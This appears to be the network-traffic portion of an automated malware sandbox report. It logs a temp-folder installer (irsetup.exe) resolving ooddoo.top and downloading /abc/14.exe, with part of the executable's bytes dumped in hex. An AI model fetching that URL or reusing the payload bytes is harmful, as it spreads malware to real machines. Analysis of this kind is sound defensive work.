                                                                                                                  Dec 29, 2024 16:09:33.131381989 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.131416082 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.131449938 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.131457090 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.131474018 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.131500959 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.292067051 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.292090893 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.292144060 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.292162895 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.292200089 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.292215109 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.299585104 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.299607992 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.299669027 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.299679041 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.299746037 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.306176901 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.306196928 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.306252003 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.306262970 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.306313992 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.313646078 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.313679934 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.313710928 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.313720942 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.313750982 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.313771009 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.321016073 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.321037054 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.321093082 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.321100950 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.321154118 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.327971935 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.327994108 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.328052044 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.328062057 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.328085899 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.328099012 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.335480928 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.335503101 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.335556030 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.335570097 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.335669041 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.342045069 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.342070103 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.342116117 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.342129946 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.342140913 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.342185974 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.502789974 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.502814054 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.502959967 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.502975941 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.503031015 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.510175943 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.510196924 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.510261059 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.510270119 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.510310888 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.516697884 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.516719103 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.516768932 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.516777992 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.516819000 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.524223089 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.524245024 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.524311066 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.524322033 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.524367094 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.531579971 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.531610966 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.531652927 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.531663895 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.531680107 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.531877041 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.538692951 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.538717031 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.538759947 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.538774967 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.538788080 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.538842916 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.546119928 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.546139956 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.546191931 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.546202898 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.546220064 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.546242952 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.552635908 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.552656889 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.552719116 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.552731991 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.552803040 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.713450909 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.713479996 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.713535070 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.713563919 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.713578939 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.713675022 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.720766068 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.720787048 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.720824957 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.720834017 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.720860004 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.720876932 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.728286028 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.728306055 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.728439093 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.728446960 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.728530884 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.734800100 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.734829903 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.734869957 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.734877110 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.734905958 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.734905958 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.742165089 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.742187023 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.742252111 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.742259979 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.742300034 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.749295950 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.749315977 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.749452114 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.749452114 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.749459982 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.749603987 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.756730080 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.756750107 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.756793976 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.756799936 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.756819010 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.756841898 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.764172077 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.764192104 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.764245987 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.764252901 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.764261961 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.764287949 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.924101114 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.924128056 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.924231052 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.924258947 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.924309015 CET49720443192.168.2.5104.21.81.224
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 29, 2024 16:09:25.286161900 CET | 61021 | 53 | 192.168.2.5 | 1.1.1.1
Dec 29, 2024 16:09:25.425190926 CET | 53 | 61021 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 29, 2024 16:09:25.286161900 CET | 192.168.2.5 | 1.1.1.1 | 0x41d7 | Standard query (0) | ooddoo.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 29, 2024 16:09:06.154895067 CET | 1.1.1.1 | 192.168.2.5 | 0xb79d | No error (0) | prod.globalsign.map.fastly.net | | 151.101.2.133 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:09:06.154895067 CET | 1.1.1.1 | 192.168.2.5 | 0xb79d | No error (0) | prod.globalsign.map.fastly.net | | 151.101.130.133 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:09:06.154895067 CET | 1.1.1.1 | 192.168.2.5 | 0xb79d | No error (0) | prod.globalsign.map.fastly.net | | 151.101.194.133 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:09:06.154895067 CET | 1.1.1.1 | 192.168.2.5 | 0xb79d | No error (0) | prod.globalsign.map.fastly.net | | 151.101.66.133 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:09:25.425190926 CET | 1.1.1.1 | 192.168.2.5 | 0x41d7 | No error (0) | ooddoo.top | | 104.21.81.224 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 16:09:25.425190926 CET | 1.1.1.1 | 192.168.2.5 | 0x41d7 | No error (0) | ooddoo.top | | 172.67.165.100 | A (IP address) | IN (0x0001) | false
• ooddoo.top

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49717 | 104.21.81.224 | 80 | 320 | C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:09:25.551390886 CET | 188 | OUT | GET /abc/14.exe HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: ooddoo.top
Connection: Keep-Alive
Cache-Control: no-cache
Dec 29, 2024 16:09:26.781719923 CET | 1013 | IN | HTTP/1.1 301 Moved Permanently
Date: Sun, 29 Dec 2024 15:09:26 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 29 Dec 2024 16:09:26 GMT
Location: https://ooddoo.top/abc/14.exe
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBq8VuWrUff49eWpat6huqtceUIt4TCwzX62K164ba1%2B71peGnAU6BfkYSR6edeTR539VwYk5wy50Sdl6BD7UVqSvjhthrcQvXaSvZhfpj4aqhJCcCeiM%2BMzG5op"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9ab6114a6a1861-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=188&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549720104.21.81.224443320C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 15:09:28 UTC139OUTGET /abc/14.exe HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Setup Factory 9.0
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Host: ooddoo.top
2024-12-29 15:09:29 UTC | 895 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 15:09:29 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 2766808
                                                                                                                  Connection: close
                                                                                                                  Last-Modified: Sun, 29 Dec 2024 14:39:31 GMT
                                                                                                                  ETag: "b1187978ff59db1:0"
                                                                                                                  Cache-Control: max-age=14400
                                                                                                                  CF-Cache-Status: MISS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uo3wECML8t0JGBihlalW2tfgPU4KDWWQhKKJGOYNoasMej7oIbMjAPMk0vJOxvIWSzT2BmvFy49Mwwr%2FN6DoR0tKcn3zGuKixio4zIK9fH4RJNhBfzK7%2BatYa9Fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f9ab61c9d7aef9d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1984&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=753&delivery_rate=1387173&cwnd=134&unsent_bytes=0&cid=9178ffa67decd7ce&ts=1380&x=0"
                                                                                                                  2024-12-29 15:09:29 UTC474INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY|zuYzuYwzuRich{u
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 4c cb 01 00 00 10 00 00 00 04 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 a0 d1 00 00 00 e0 01 00 00 62 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 68 1c 00 00 00 c0 02 00 00 04 00 00 00 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 81 21 00 00 00 e0 02 00 00 0e 00 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 2c 1b 00 00 00 10 03 00 00 18 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00
                                                                                                                  Data Ascii: L ` b@@ hj@ !n@@ ,|@B.idata
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: e2 a0 11 f8 65 5c c3 c2 24 c3 73 15 e0 29 f8 f8 fc 0f 47 82 ae df 4a 11 59 70 5a db 7e 81 ac 46 ea 99 12 d5 17 47 72 36 c1 93 0b 1e ee 74 79 93 12 e5 ac 95 c1 f3 82 4a da 32 72 1b 59 c7 94 80 1c e2 4a 1f 9c 91 01 e7 6c 3f 12 64 a4 20 fb 46 11 b3 9b 82 2f db 6d aa b2 ab ff c2 fe 67 b6 43 0c f7 e1 c9 57 71 8f cf 1f b2 af f2 6c 11 11 4b 6e 22 13 37 f5 fa 16 86 de a3 1c 8a 9e c4 50 7b 82 41 a7 fb 60 e7 ed f8 88 85 b7 4f e3 86 81 b9 58 76 c2 89 04 87 ff 4c 4c 17 a7 05 3b 27 b8 be 1f fb 00 3b c4 61 7d e7 82 9e 79 c2 9a 87 91 4b 02 c8 b6 fe 79 6c 27 c3 75 64 ec 47 2d f6 22 80 55 ab b1 5d 62 9b 28 85 f5 4a 7d b7 e9 75 73 6e 13 b6 19 fb dd b9 8b 9f 42 ec d5 a9 43 0e 44 72 c5 7a d1 c6 a5 d0 b7 d7 34 89 e3 58 fd e5 ab 45 9a 8f 95 49 d8 aa 7d 14 31 9f 7b c3 c5 3e 9b
                                                                                                                  Data Ascii: e\$s)GJYpZ~FGr6tyJ2rYJl?d F/mgCWqlKn"7P{A`OXvLL;';a}yKyl'udG-"U]b(J}usnBCDrz4XEI}1{>
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: ff e6 aa 50 ef 79 09 20 af 39 99 33 29 18 c3 d8 8c 34 87 39 7f a7 d7 f0 70 c4 ce d8 97 c7 2d 31 09 a2 da 4d a5 4e 39 3c b2 7b 23 cc 2d 1c 3c 82 ff 9e fe 7a 87 96 45 d7 5f 65 f5 ff 06 bb 08 ae bc 90 4f ce 1a 5e cf 6f a5 37 6d f8 f6 0b 7e dd 25 2a a4 57 b4 21 89 4e 31 e2 6b 10 5f ae 53 ce 8a 08 9c f6 e7 22 73 67 ce 52 9d 28 78 05 63 ba 67 1c 9e 31 2a ad 43 85 de bd fc 76 c0 51 81 fa ea 4b f3 16 86 49 99 34 61 b9 49 58 14 2f 86 3c 49 92 f3 17 6d 76 9b 0d 70 ef 50 7e 1e 68 c3 c4 04 bb f9 67 cb 30 c4 5f 60 53 23 8e fe 81 aa 16 8d bf fb 64 83 f7 50 95 ce 5c ff 9a 36 90 50 7f bc d9 8e 0a ff 88 9b 46 a8 10 b1 1c ab 38 46 be 81 a5 ca cf f7 ad 42 b1 cb af 9b 47 47 83 22 96 56 90 83 64 d0 13 f0 66 3b 93 f0 bc 47 b1 f3 1e f9 ab 4d ae 99 3f 72 28 b0 21 c6 6d 94 0b f2
                                                                                                                  Data Ascii: Py 93)49p-1MN9<{#-<zE_eO^o7m~%*W!N1k_S"sgR(xcg1*CvQKI4aIX/<ImvpP~hg0_`S#dP\6PF8FBGG"Vdf;GM?r(!m
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: a2 56 af 2a 88 81 6d 5f 38 e3 34 f6 1e 50 57 ae a0 0d e8 25 3e 2b c1 5e a3 75 b6 58 8c c4 5e 53 bd ef 55 ea d3 4f 6f 44 87 5d 8c db f4 ed 35 fa ab 37 dc 94 9f b5 be 13 a2 89 e7 2f 07 17 0d f0 2b bf 13 b5 7c 88 de e6 22 10 be 2b 18 fa 3b 0f 2f c6 e7 15 1b fd 61 ad b3 ca 16 ee bd c7 26 a3 5a 21 78 a5 03 e8 ed ba 9a 27 10 43 9e b7 15 20 c3 55 ce 50 ed 45 12 2f 37 b6 a1 19 d1 88 e4 b8 a4 48 e4 41 82 91 18 a3 68 bb 30 55 bf 1b 17 22 df 5e 76 ca 8c e0 a6 a4 8a e1 6d 5f 33 f5 30 1e a3 ee 23 85 1e cf 00 2a ef 2a 0c d0 78 ca 3b d5 26 7e bb 8f 2d c4 9a 7d 9f 62 47 a0 4d 4b 2b c7 d4 77 ab b0 df c8 bd 88 ac f9 cf 70 b6 32 9d a1 c1 b3 8a 5b b2 ee a6 6f 4c 89 26 89 03 aa bb 60 0c c1 a1 7e 27 3b 6e 3f 2f 49 96 64 cf 26 5b ce b8 c4 b8 f1 4a f3 65 45 5f 23 07 af 67 e3 fd
                                                                                                                  Data Ascii: V*m_84PW%>+^uX^SUOoD]57/+|"+;/a&Z!x'C UPE/7HAh0U"^vm_30#**x;&~-}bGMK+wp2[oL&`~';n?/Id&[JeE_#g
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: bd 9f a0 2c 65 e5 82 db 5c 6a 5e 7c 2d ec 35 53 8f 17 9c 71 08 b4 cb b2 e6 09 f0 2e a9 16 e1 ad 3b 00 79 bf 94 16 72 a4 ee f2 eb 92 69 19 14 ea ff 10 23 fb 12 b0 22 1f c7 80 15 0d f0 56 7c 5b 44 30 b9 b8 94 89 b5 13 63 7c 00 b5 fe 05 4b ea 8d 51 c3 44 6d 12 61 d6 cc 6d f6 89 4d 11 a8 a6 1d 43 a7 f3 66 5b 60 04 e6 f2 27 49 62 17 5d b1 9a cf 16 ff e6 cc 88 67 47 65 da ea d8 97 96 a3 db f2 9c 3a ee 55 f9 bd be de b6 dd 96 32 96 11 fa 8a 33 8b aa c4 d8 a1 8f 3b ac 9d 99 f2 98 f1 3d 9a 17 ba 8f cc b7 78 f7 51 eb e6 f2 e4 3b e3 34 24 e5 dd d6 17 c7 65 40 96 63 4f 04 86 f4 93 a0 4a 57 d7 03 a5 4e e3 38 e9 52 e0 c2 c6 00 f8 d0 1c 82 b4 c3 ce 85 ff 0d ea 54 46 80 ae e0 df 0e 2b 98 b4 30 d7 d5 50 8e f1 a8 58 e3 94 3c 3e a7 83 86 5a b4 0a f3 6f 8b e7 23 77 28 eb b7
                                                                                                                  Data Ascii: ,e\j^|-5Sq.;yri#"V|[D0c|KQDmamMCf[`'Ib]gGe:U23;=xQ;4$e@cOJWN8RTF+0PX<>Zo#w(
